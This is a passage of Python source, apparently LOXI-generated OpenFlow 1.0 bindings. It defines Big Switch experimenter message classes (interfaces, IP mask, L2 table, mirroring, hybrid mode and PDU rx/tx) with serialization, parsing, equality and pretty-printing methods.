            self.enable = enable
        else:
            self.enable = 0
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.enable))
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_bw_enable_set_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 18)
        obj.enable = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.enable != other.enable: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_bw_enable_set_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("enable = ");
                q.text("%#x" % self.enable)
            q.breakable()
        q.text('}')
bsn_header.subtypes[18] = bsn_bw_enable_set_request
class bsn_get_interfaces_reply(bsn_header):
    """BSN experimenter message, subtype 10: interface-list reply.

    Payload after the experimenter header: a packed list of
    ofp.common.bsn_interface entries.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 10
    def __init__(self, xid=None, interfaces=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if interfaces != None:
            self.interfaces = interfaces
        else:
            self.interfaces = []
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(loxi.generic_util.pack_list(self.interfaces))
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_get_interfaces_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 10)
        # remaining bytes are consumed as bsn_interface list entries
        obj.interfaces = loxi.generic_util.unpack_list(reader, ofp.common.bsn_interface.unpack)
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.interfaces != other.interfaces: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_get_interfaces_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("interfaces = ");
                q.pp(self.interfaces)
            q.breakable()
        q.text('}')
bsn_header.subtypes[10] = bsn_get_interfaces_reply
class bsn_get_interfaces_request(bsn_header):
    """BSN experimenter message, subtype 9: request the switch interface list.

    Header-only message; no payload beyond the experimenter header.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 9
    def __init__(self, xid=None):
        # None means the transaction id has not been assigned yet.
        self.xid = xid
    def pack(self):
        # Serialize the header fields; slot 2 holds a dummy length that is
        # overwritten with the computed total below.
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),
            struct.pack("!L", self.xid),
            struct.pack("!L", self.experimenter),
            struct.pack("!L", self.subtype),
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)
    @staticmethod
    def unpack(reader):
        obj = bsn_get_interfaces_request()
        assert(reader.read("!B")[0] == 1)   # version
        assert(reader.read("!B")[0] == 4)   # type
        _length = reader.read("!H")[0]
        # clamp the reader to the declared message length
        reader = reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        assert(reader.read("!L")[0] == 6035143)  # experimenter
        assert(reader.read("!L")[0] == 9)        # subtype
        return obj
    def __eq__(self, other):
        return type(self) == type(other) and self.xid == other.xid
    def pretty_print(self, q):
        q.text("bsn_get_interfaces_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid != None else 'None')
            q.breakable()
        q.text('}')
bsn_header.subtypes[9] = bsn_get_interfaces_request
class bsn_get_ip_mask_reply(bsn_header):
    """BSN experimenter message, subtype 2: IP-mask table entry reply.

    Payload after the experimenter header: index (u8), 3 pad bytes,
    mask (u32).
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 2
    def __init__(self, xid=None, index=None, mask=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if index != None:
            self.index = index
        else:
            self.index = 0
        if mask != None:
            self.mask = mask
        else:
            self.mask = 0
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!B", self.index))
        packed.append('\x00' * 3)
        packed.append(struct.pack("!L", self.mask))
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_get_ip_mask_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 2)
        obj.index = reader.read("!B")[0]
        reader.skip(3)
        obj.mask = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.index != other.index: return False
        if self.mask != other.mask: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_get_ip_mask_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("index = ");
                q.text("%#x" % self.index)
                q.text(","); q.breakable()
                q.text("mask = ");
                q.text("%#x" % self.mask)
            q.breakable()
        q.text('}')
bsn_header.subtypes[2] = bsn_get_ip_mask_reply
class bsn_get_ip_mask_request(bsn_header):
    """BSN experimenter message, subtype 1: request one IP-mask table entry.

    Payload after the experimenter header: index (u8), 7 pad bytes.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 1
    def __init__(self, xid=None, index=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if index != None:
            self.index = index
        else:
            self.index = 0
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!B", self.index))
        packed.append('\x00' * 7)
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_get_ip_mask_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 1)
        obj.index = reader.read("!B")[0]
        reader.skip(7)
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.index != other.index: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_get_ip_mask_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("index = ");
                q.text("%#x" % self.index)
            q.breakable()
        q.text('}')
bsn_header.subtypes[1] = bsn_get_ip_mask_request
class bsn_get_l2_table_reply(bsn_header):
    """BSN experimenter message, subtype 14: L2 table configuration reply.

    Payload after the experimenter header: l2_table_enable (u8), 1 pad
    byte, l2_table_priority (u16), 4 pad bytes.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 14
    def __init__(self, xid=None, l2_table_enable=None, l2_table_priority=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if l2_table_enable != None:
            self.l2_table_enable = l2_table_enable
        else:
            self.l2_table_enable = 0
        if l2_table_priority != None:
            self.l2_table_priority = l2_table_priority
        else:
            self.l2_table_priority = 0
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!B", self.l2_table_enable))
        packed.append('\x00' * 1)
        packed.append(struct.pack("!H", self.l2_table_priority))
        packed.append('\x00' * 4)
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_get_l2_table_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 14)
        obj.l2_table_enable = reader.read("!B")[0]
        reader.skip(1)
        obj.l2_table_priority = reader.read("!H")[0]
        reader.skip(4)
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.l2_table_enable != other.l2_table_enable: return False
        if self.l2_table_priority != other.l2_table_priority: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_get_l2_table_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("l2_table_enable = ");
                q.text("%#x" % self.l2_table_enable)
                q.text(","); q.breakable()
                q.text("l2_table_priority = ");
                q.text("%#x" % self.l2_table_priority)
            q.breakable()
        q.text('}')
bsn_header.subtypes[14] = bsn_get_l2_table_reply
class bsn_get_l2_table_request(bsn_header):
    """BSN experimenter message, subtype 13: query the L2 table configuration.

    Header-only message; no payload beyond the experimenter header.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 13
    def __init__(self, xid=None):
        # xid is left as given; None until the connection assigns one.
        self.xid = xid
    def pack(self):
        # Header fields first; index 2 carries a dummy length that is
        # replaced with the computed total once everything is packed.
        buf = []
        buf.append(struct.pack("!B", self.version))
        buf.append(struct.pack("!B", self.type))
        buf.append(struct.pack("!H", 0))
        buf.append(struct.pack("!L", self.xid))
        buf.append(struct.pack("!L", self.experimenter))
        buf.append(struct.pack("!L", self.subtype))
        total = sum(map(len, buf))
        buf[2] = struct.pack("!H", total)
        return ''.join(buf)
    @staticmethod
    def unpack(reader):
        msg = bsn_get_l2_table_request()
        assert(reader.read("!B")[0] == 1)   # version
        assert(reader.read("!B")[0] == 4)   # type
        _length = reader.read("!H")[0]
        reader = reader.slice(_length, 4)   # clamp to declared length
        msg.xid = reader.read("!L")[0]
        assert(reader.read("!L")[0] == 6035143)  # experimenter
        assert(reader.read("!L")[0] == 13)       # subtype
        return msg
    def __eq__(self, other):
        if type(self) != type(other):
            return False
        return self.xid == other.xid
    def pretty_print(self, q):
        q.text("bsn_get_l2_table_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is None:
                    q.text('None')
                else:
                    q.text("%#x" % self.xid)
            q.breakable()
        q.text('}')
bsn_header.subtypes[13] = bsn_get_l2_table_request
class bsn_get_mirroring_reply(bsn_header):
    """BSN experimenter message, subtype 5: mirroring configuration reply.

    Payload after the experimenter header: report_mirror_ports (u8),
    3 pad bytes.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 5
    def __init__(self, xid=None, report_mirror_ports=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if report_mirror_ports != None:
            self.report_mirror_ports = report_mirror_ports
        else:
            self.report_mirror_ports = 0
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!B", self.report_mirror_ports))
        packed.append('\x00' * 3)
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_get_mirroring_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 5)
        obj.report_mirror_ports = reader.read("!B")[0]
        reader.skip(3)
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.report_mirror_ports != other.report_mirror_ports: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_get_mirroring_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("report_mirror_ports = ");
                q.text("%#x" % self.report_mirror_ports)
            q.breakable()
        q.text('}')
bsn_header.subtypes[5] = bsn_get_mirroring_reply
class bsn_get_mirroring_request(bsn_header):
    """BSN experimenter message, subtype 4: query mirroring configuration.

    Payload after the experimenter header: report_mirror_ports (u8),
    3 pad bytes.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 4
    def __init__(self, xid=None, report_mirror_ports=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if report_mirror_ports != None:
            self.report_mirror_ports = report_mirror_ports
        else:
            self.report_mirror_ports = 0
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!B", self.report_mirror_ports))
        packed.append('\x00' * 3)
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_get_mirroring_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 4)
        obj.report_mirror_ports = reader.read("!B")[0]
        reader.skip(3)
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.report_mirror_ports != other.report_mirror_ports: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_get_mirroring_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("report_mirror_ports = ");
                q.text("%#x" % self.report_mirror_ports)
            q.breakable()
        q.text('}')
bsn_header.subtypes[4] = bsn_get_mirroring_request
class bsn_hybrid_get_reply(bsn_header):
    """BSN experimenter message, subtype 28: hybrid-mode status reply.

    Payload after the experimenter header: hybrid_enable (u8), 1 pad
    byte, hybrid_version (u16), 4 pad bytes.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 28
    def __init__(self, xid=None, hybrid_enable=None, hybrid_version=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if hybrid_enable != None:
            self.hybrid_enable = hybrid_enable
        else:
            self.hybrid_enable = 0
        if hybrid_version != None:
            self.hybrid_version = hybrid_version
        else:
            self.hybrid_version = 0
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!B", self.hybrid_enable))
        packed.append('\x00' * 1)
        packed.append(struct.pack("!H", self.hybrid_version))
        packed.append('\x00' * 4)
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_hybrid_get_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 28)
        obj.hybrid_enable = reader.read("!B")[0]
        reader.skip(1)
        obj.hybrid_version = reader.read("!H")[0]
        reader.skip(4)
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.hybrid_enable != other.hybrid_enable: return False
        if self.hybrid_version != other.hybrid_version: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_hybrid_get_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("hybrid_enable = ");
                q.text("%#x" % self.hybrid_enable)
                q.text(","); q.breakable()
                q.text("hybrid_version = ");
                q.text("%#x" % self.hybrid_version)
            q.breakable()
        q.text('}')
bsn_header.subtypes[28] = bsn_hybrid_get_reply
class bsn_hybrid_get_request(bsn_header):
    """BSN experimenter message, subtype 27: query hybrid-mode status.

    Header-only message; no payload beyond the experimenter header.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 27
    def __init__(self, xid=None):
        self.xid = xid  # transaction id; None until assigned
    def pack(self):
        # Build the 16-byte header with a zero length field, then splice
        # the real length into bytes 2:4.
        hdr = ''.join([
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),
            struct.pack("!L", self.xid),
            struct.pack("!L", self.experimenter),
            struct.pack("!L", self.subtype),
        ])
        return hdr[:2] + struct.pack("!H", len(hdr)) + hdr[4:]
    @staticmethod
    def unpack(reader):
        msg = bsn_hybrid_get_request()
        version, = reader.read("!B")
        assert(version == 1)
        msg_type, = reader.read("!B")
        assert(msg_type == 4)
        declared_len, = reader.read("!H")
        # restrict reads to the declared message length
        reader = reader.slice(declared_len, 4)
        msg.xid, = reader.read("!L")
        experimenter, = reader.read("!L")
        assert(experimenter == 6035143)
        subtype, = reader.read("!L")
        assert(subtype == 27)
        return msg
    def __eq__(self, other):
        return type(self) == type(other) and self.xid == other.xid
    def pretty_print(self, q):
        q.text("bsn_hybrid_get_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text('None' if self.xid is None else "%#x" % self.xid)
            q.breakable()
        q.text('}')
bsn_header.subtypes[27] = bsn_hybrid_get_request
class bsn_pdu_rx_reply(bsn_header):
    """BSN experimenter message, subtype 34: reply to a PDU-receive request.

    Payload after the experimenter header: status (u32), port_no
    (packed via util.pack_port_no), slot_num (u8).
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 34
    def __init__(self, xid=None, status=None, port_no=None, slot_num=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if status != None:
            self.status = status
        else:
            self.status = 0
        if port_no != None:
            self.port_no = port_no
        else:
            self.port_no = 0
        if slot_num != None:
            self.slot_num = slot_num
        else:
            self.slot_num = 0
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.status))
        packed.append(util.pack_port_no(self.port_no))
        packed.append(struct.pack("!B", self.slot_num))
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_pdu_rx_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 34)
        obj.status = reader.read("!L")[0]
        obj.port_no = util.unpack_port_no(reader)
        obj.slot_num = reader.read("!B")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.status != other.status: return False
        if self.port_no != other.port_no: return False
        if self.slot_num != other.slot_num: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_pdu_rx_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("status = ");
                q.text("%#x" % self.status)
                q.text(","); q.breakable()
                q.text("port_no = ");
                q.text(util.pretty_port(self.port_no))
                q.text(","); q.breakable()
                q.text("slot_num = ");
                q.text("%#x" % self.slot_num)
            q.breakable()
        q.text('}')
bsn_header.subtypes[34] = bsn_pdu_rx_reply
class bsn_pdu_rx_request(bsn_header):
    """BSN experimenter message, subtype 33: start expecting a PDU on a port.

    Payload after the experimenter header: timeout_ms (u32), port_no,
    slot_num (u8), 3 pad bytes, then the expected PDU bytes (rest of
    the message).
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 33
    def __init__(self, xid=None, timeout_ms=None, port_no=None, slot_num=None, data=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if timeout_ms != None:
            self.timeout_ms = timeout_ms
        else:
            self.timeout_ms = 0
        if port_no != None:
            self.port_no = port_no
        else:
            self.port_no = 0
        if slot_num != None:
            self.slot_num = slot_num
        else:
            self.slot_num = 0
        if data != None:
            self.data = data
        else:
            self.data = ''
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.timeout_ms))
        packed.append(util.pack_port_no(self.port_no))
        packed.append(struct.pack("!B", self.slot_num))
        packed.append('\x00' * 3)
        packed.append(self.data)
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_pdu_rx_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 33)
        obj.timeout_ms = reader.read("!L")[0]
        obj.port_no = util.unpack_port_no(reader)
        obj.slot_num = reader.read("!B")[0]
        reader.skip(3)
        # remainder of the message is the raw PDU payload
        obj.data = str(reader.read_all())
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.timeout_ms != other.timeout_ms: return False
        if self.port_no != other.port_no: return False
        if self.slot_num != other.slot_num: return False
        if self.data != other.data: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_pdu_rx_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("timeout_ms = ");
                q.text("%#x" % self.timeout_ms)
                q.text(","); q.breakable()
                q.text("port_no = ");
                q.text(util.pretty_port(self.port_no))
                q.text(","); q.breakable()
                q.text("slot_num = ");
                q.text("%#x" % self.slot_num)
                q.text(","); q.breakable()
                q.text("data = ");
                q.pp(self.data)
            q.breakable()
        q.text('}')
bsn_header.subtypes[33] = bsn_pdu_rx_request
class bsn_pdu_rx_timeout(bsn_header):
    """BSN experimenter message, subtype 35: notification that a PDU-receive
    request timed out.

    Payload after the experimenter header: port_no, slot_num (u8).
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 35
    def __init__(self, xid=None, port_no=None, slot_num=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if port_no != None:
            self.port_no = port_no
        else:
            self.port_no = 0
        if slot_num != None:
            self.slot_num = slot_num
        else:
            self.slot_num = 0
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(util.pack_port_no(self.port_no))
        packed.append(struct.pack("!B", self.slot_num))
        # patch the real total length over the placeholder
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        obj = bsn_pdu_rx_timeout()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # limit the reader to this message's declared length
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 35)
        obj.port_no = util.unpack_port_no(reader)
        obj.slot_num = reader.read("!B")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.port_no != other.port_no: return False
        if self.slot_num != other.slot_num: return False
        return True
    def pretty_print(self, q):
        q.text("bsn_pdu_rx_timeout {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("port_no = ");
                q.text(util.pretty_port(self.port_no))
                q.text(","); q.breakable()
                q.text("slot_num = ");
                q.text("%#x" % self.slot_num)
            q.breakable()
        q.text('}')
bsn_header.subtypes[35] = bsn_pdu_rx_timeout
class bsn_pdu_tx_reply(bsn_header):
    """BSN experimenter message, subtype 32: reply to a PDU-transmit request.

    Payload after the experimenter header: status (u32), port_no,
    slot_num (u8).
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 32
    def __init__(self, xid=None, status=None, port_no=None, slot_num=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if status != None:
            self.status = status
        else:
            self.status = 0
        if port_no != None:
            self.port_no = port_no
        else:
            self.port_no = 0
        if slot_num != None:
            self.slot_num = slot_num
        else:
            self.slot_num = 0
        return
    def pack(self):
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.status))
        packed.append(util.pack_port_no(self.port_no))
        packed.append(struct.pack("!B", self.slot_num))
        # patch the real total length over the placeholder
